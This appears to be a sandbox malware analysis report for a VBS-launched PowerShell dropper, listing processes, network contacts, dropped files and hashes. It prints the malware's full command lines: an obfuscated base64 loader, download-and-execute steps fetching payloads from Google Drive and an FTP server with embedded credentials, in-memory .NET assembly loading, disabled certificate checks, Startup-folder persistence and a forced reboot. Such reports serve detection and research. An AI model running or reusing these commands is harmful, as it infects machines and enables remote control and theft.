| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革DEЌз革ZQB1Ќз革HIЌз革dЌз革Ќз革nЌз革CЌз革Ќз革LЌз革Ќз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革CЌз革Ќз革LЌз革Ќз革gЌз革CcЌз革aЌз革B0Ќз革HQЌз革cЌз革BzЌз革DoЌз革LwЌз革vЌз革G0Ќз革ZQBoЌз革HIЌз革ZQBlЌз革G4Ќз革YwByЌз革GUЌз革YQB0Ќз革GkЌз革bwBuЌз革C4Ќз革YwBvЌз革G0Ќз革LwBpЌз革G4Ќз革LgB0Ќз革HgЌз革dЌз革Ќз革nЌз革CЌз革Ќз革KЌз革Ќз革gЌз革F0Ќз革XQBbЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革FsЌз革IЌз革Ќз革sЌз革CЌз革Ќз革bЌз革BsЌз革HUЌз革bgЌз革kЌз革CЌз革Ќз革KЌз革BlЌз革GsЌз革bwB2Ќз革G4Ќз革SQЌз革uЌз革CkЌз革IЌз革Ќз革nЌз革EkЌз革VgBGЌз革HIЌз革cЌз革Ќз革nЌз革CЌз革Ќз革KЌз革BkЌз革G8Ќз革aЌз革B0Ќз革GUЌз革TQB0Ќз革GUЌз革RwЌз革uЌз革CkЌз革JwЌз革xЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革uЌз革DMЌз革eQByЌз革GEЌз革cgBiЌз革GkЌз革TЌз革BzЌз革HMЌз革YQBsЌз革EMЌз革JwЌз革oЌз革GUЌз革cЌз革B5Ќз革FQЌз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CЌз革Ќз革WgBjЌз革EIЌз革YwBhЌз革CQЌз革IЌз革Ќз革oЌз革GQЌз革YQBvЌз革EwЌз革LgBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革B0Ќз革G4Ќз革ZQByЌз革HIЌз革dQBDЌз革DoЌз革OgBdЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HЌз革Ќз革cЌз革BBЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革CkЌз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBBЌз革CcЌз革IЌз革Ќз革sЌз革CЌз革Ќз革JwCTIToЌз革kyEnЌз革CЌз革Ќз革KЌз革BlЌз革GMЌз革YQBsЌз革HЌз革Ќз革ZQBSЌз革C4Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革NЌз革Ќз革2Ќз革GUЌз革cwBhЌз革EIЌз革bQBvЌз革HIЌз革RgЌз革6Ќз革DoЌз革XQB0Ќз革HIЌз革ZQB2Ќз革G4Ќз革bwBDЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BaЌз革GMЌз革QgBjЌз革GEЌз革JЌз革Ќз革gЌз革F0Ќз革XQBbЌз革GUЌз革dЌз革B5Ќз革EIЌз革WwЌз革7Ќз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革PQЌз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革DsЌз革KQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革HIЌз革dwBjЌз革GwЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革KQЌз革oЌз革GUЌз革cwBvЌз革HЌз革Ќз革cwBpЌз革GQЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革JwB0Ќз革HgЌз革dЌз革Ќз革uЌз革DEЌз革MЌз革BMЌз革EwЌз革RЌз革Ќз革vЌз革DEЌз革MЌз革Ќз革vЌз革HIЌз革ZQB0Ќз革HЌз革Ќз革eQByЌз革GMЌз革cЌз革BVЌз革C8Ќз革cgBiЌз革C4Ќз革bQBvЌз革GMЌз革LgB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C4Ќз革cЌз革B0Ќз革GYЌз革QЌз革Ќз革xЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LwЌз革vЌз革DoЌз革cЌз革B0Ќз革GYЌз革JwЌз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革pЌз革CcЌз革QЌз革BЌз革Ќз革HЌз革Ќз革SgЌз革4Ќз革DcЌз革NQЌз革xЌз革DIЌз革bwByЌз革HЌз革Ќз革cgBlЌз革HЌз革Ќз革bwBsЌз革GUЌз革dgBlЌз革GQЌз革JwЌз革sЌз革CkЌз革KQЌз革5Ќз革DQЌз革LЌз革Ќз革2Ќз革DEЌз革MQЌз革sЌз革DcЌз革OQЌз革sЌз革DQЌз革MQЌз革xЌз革CwЌз革OЌз革Ќз革5Ќз革CwЌз革OЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DЌз革Ќз革MQЌз革sЌз革DkЌз革OQЌз革sЌз革DUЌз革MQЌз革xЌз革CwЌз革MQЌз革wЌз革DEЌз革LЌз革Ќз革wЌз革DЌз革Ќз革MQЌз革oЌз革F0Ќз革XQBbЌз革HIЌз革YQBoЌз革GMЌз革WwЌз革gЌз革G4Ќз革aQBvЌз革GoЌз革LQЌз革oЌз革CgЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwBrЌз革HIЌз革bwB3Ќз革HQЌз革ZQBOЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革C0Ќз革dwBlЌз革G4Ќз革IЌз革Ќз革9Ќз革CЌз革Ќз革cwBsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DIЌз革MQBzЌз革GwЌз革VЌз革Ќз革6Ќз革DoЌз革XQBlЌз革HЌз革Ќз革eQBUЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革fQBlЌз革HUЌз革cgB0Ќз革CQЌз革ewЌз革gЌз革D0Ќз革IЌз革BrЌз革GMЌз革YQBiЌз革GwЌз革bЌз革BhЌз革EMЌз革bgBvЌз革GkЌз革dЌз革BhЌз革GQЌз革aQBsЌз革GEЌз革VgBlЌз革HQЌз革YQBjЌз革GkЌз革ZgBpЌз革HQЌз革cgBlЌз革EMЌз革cgBlЌз革HYЌз革cgBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwB7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革CЌз革Ќз革ZgЌз革vЌз革CЌз革Ќз革MЌз革Ќз革gЌз革HQЌз革LwЌз革gЌз革HIЌз革LwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bgB3Ќз革G8Ќз革ZЌз革B0Ќз革HUЌз革aЌз革BzЌз革CЌз革Ќз革OwЌз革nЌз革DЌз革Ќз革OЌз革Ќз革xЌз革CЌз革Ќз革cЌз革BlЌз革GUЌз革bЌз革BzЌз革CcЌз革IЌз革BkЌз革G4Ќз革YQBtЌз革G0Ќз革bwBjЌз革C0Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革OwЌз革gЌз革GUЌз革YwByЌз革G8Ќз革ZgЌз革tЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革cЌз革B1Ќз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革bQBhЌз革HIЌз革ZwBvЌз革HIЌз革UЌз革BcЌз革HUЌз革bgBlЌз革E0Ќз革IЌз革B0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革HcЌз革bwBkЌз革G4Ќз革aQBXЌз革FwЌз革dЌз革BmЌз革G8Ќз革cwBvЌз革HIЌз革YwBpЌз革E0Ќз革XЌз革BnЌз革G4Ќз革aQBtЌз革GEЌз革bwBSЌз革FwЌз革YQB0Ќз革GEЌз革RЌз革BwЌз革HЌз革Ќз革QQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革IЌз革Ќз革oЌз革CЌз革Ќз革bgBvЌз革GkЌз革dЌз革BhЌз革G4Ќз革aQB0Ќз革HMЌз革ZQBEЌз革C0Ќз革IЌз革Ќз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革G0Ќз革ZQB0Ќз革EkЌз革LQB5Ќз革HЌз革Ќз革bwBDЌз革CЌз革Ќз革OwЌз革gЌз革HQЌз革cgBhЌз革HQЌз革cwBlЌз革HIЌз革bwBuЌз革C8Ќз革IЌз革B0Ќз革GUЌз革aQB1Ќз革HEЌз革LwЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革YQBzЌз革HUЌз革dwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革gЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革7Ќз革CkЌз革IЌз革BlЌз革G0Ќз革YQBOЌз革HIЌз革ZQBzЌз革FUЌз革OgЌз革6Ќз革F0Ќз革dЌз革BuЌз革GUЌз革bQBuЌз革G8Ќз革cgBpЌз革HYЌз革bgBFЌз革FsЌз革IЌз革Ќз革rЌз革CЌз革Ќз革JwBcЌз革HMЌз革cgBlЌз革HMЌз革VQBcЌз革DoЌз革QwЌз革nЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CЌз革Ќз革LЌз革BCЌз革EsЌз革TЌз革BSЌз革FUЌз革JЌз革Ќз革oЌз革GUЌз革bЌз革BpЌз革EYЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革HQЌз革TwBMЌз革GMЌз革XwBLЌз革GEЌз革MwBaЌз革GYЌз革bwBYЌз革DIЌз革SgBKЌз革HIЌз革VgBoЌз革G0Ќз革VgЌз革5Ќз革GMЌз革bQЌз革5Ќз革FgЌз革cwB1Ќз革FgЌз革bQBqЌз革DEЌз革ZwЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革B7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革MgЌз革0Ќз革HUЌз革WЌз革BKЌз革FQЌз革cQBhЌз革G0Ќз革ZwB5Ќз革E0Ќз革dЌз革BGЌз革HoЌз革YQBrЌз革FЌз革Ќз革UgЌз革xЌз革HEЌз革XwBJЌз革HYЌз革RwBpЌз革FgЌз革TgBkЌз革HEЌз革YQBOЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JAAoACAAPQAgAEYAYQBFAFkAUgAkAHsAIAApACAAVwBpAGkAQgBzACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABXAGkAaQBCAHMAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAARgBhAEUAWQBSACQAOwApACAAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAZABJAFIAaQBNACQAIAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGQASQBSAGkATQAkAHsAIAApACAARgBkAE0AUQBUACQAIAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAARgBkAE0AUQBUACQAIAA7AA==';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs');powershell $IedxR
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lcwr.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $lcwr.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lcwr.dispose();$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $lcwr.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ni/moc.noitaercneerhem//:sptth' , $hzwje , 'true1' ) );};"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\iocpf.ps1"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\AT000005112563923.vbs"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4188 -ip 4188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 620
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.desckvbrat.com.br | udp |
| BR | 191.252.83.213:21 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.83.252.191.in-addr.arpa | udp |
| BR | 191.252.83.213:60545 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | api.pastecode.io | udp |
| US | 172.67.177.136:443 | api.pastecode.io | tcp |
| US | 8.8.8.8:53 | 136.177.67.172.in-addr.arpa | udp |
| BR | 191.252.83.213:60100 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | mehreencreation.com | udp |
| IN | 180.149.241.246:443 | mehreencreation.com | tcp |
| US | 8.8.8.8:53 | 246.241.149.180.in-addr.arpa | udp |
| BR | 191.252.83.213:60842 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.170.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/3928-0-0x00007FFAF38B3000-0x00007FFAF38B5000-memory.dmp
memory/3928-1-0x00000260EA660000-0x00000260EA682000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d1fuoo4f.ogx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3928-11-0x00007FFAF38B0000-0x00007FFAF4371000-memory.dmp
memory/3928-12-0x00007FFAF38B0000-0x00007FFAF4371000-memory.dmp
memory/4972-22-0x000001E517D60000-0x000001E517D6A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1
| MD5 | 9bd56f14a581eeb900023c9c0a442aec |
| SHA1 | af4d5c929bcaa109a37cc710f3b9b4af7d17da7e |
| SHA256 | 4b9a9f753c2523359e1465246f8632710877b938493d6a2e0c377deafe914cce |
| SHA512 | bb75624f826e3ab2d16620028393f943d8b421ebf1969020421532133aa134decf9cf27dbd68555b94c64cd694c67b602f228c835fbf758f87f12601e5a3926e |
memory/3928-36-0x00007FFAF38B3000-0x00007FFAF38B5000-memory.dmp
memory/3928-37-0x00007FFAF38B0000-0x00007FFAF4371000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7d5d8cf9f65ce79e552409c240295219 |
| SHA1 | ec5e938110638dcd176ce0645682a0d3949dd5a8 |
| SHA256 | 817d6bfa16b959aae0dec64568ec6d98fdd61a205c61dde60551e192e5478596 |
| SHA512 | 0d06c42b9c5648311000eefe9bd5a952dafd999b5c7ab17dbbebb6c6d9cd4b1de451e13ef0af72dfa3557aee8cb8bb5521642db843c3f61dfd701dd6c95afb68 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3a1e249212d4af8ee7f335a5dfd075ba |
| SHA1 | 8ab2019e5d1376124bd79b822b9b1d4a794de076 |
| SHA256 | 046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa |
| SHA512 | 8a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b |
memory/3928-46-0x00007FFAF38B0000-0x00007FFAF4371000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\iocpf.ps1
| MD5 | 6b984798469755f348748b3c42a8c5ae |
| SHA1 | e5d6bbf73f95d2f61f9a3b45403f86e723a33233 |
| SHA256 | 0606d5c1697b50874624965cafd426875c4cf2fa7d22d696608afe9f7ffb415f |
| SHA512 | c41476410a9cba4415f09c29cb7d3f1c5c943aa3f5ee09c60bbe051d9968b00de782105a647877ff48d39cf514f0e313af46039f8c2262f928dbefd675fae31b |
memory/1592-58-0x0000012D8B170000-0x0000012D8B17A000-memory.dmp
memory/4188-59-0x0000000000400000-0x0000000000455000-memory.dmp
memory/4188-63-0x0000000000400000-0x0000000000455000-memory.dmp
memory/4188-61-0x0000000000400000-0x0000000000455000-memory.dmp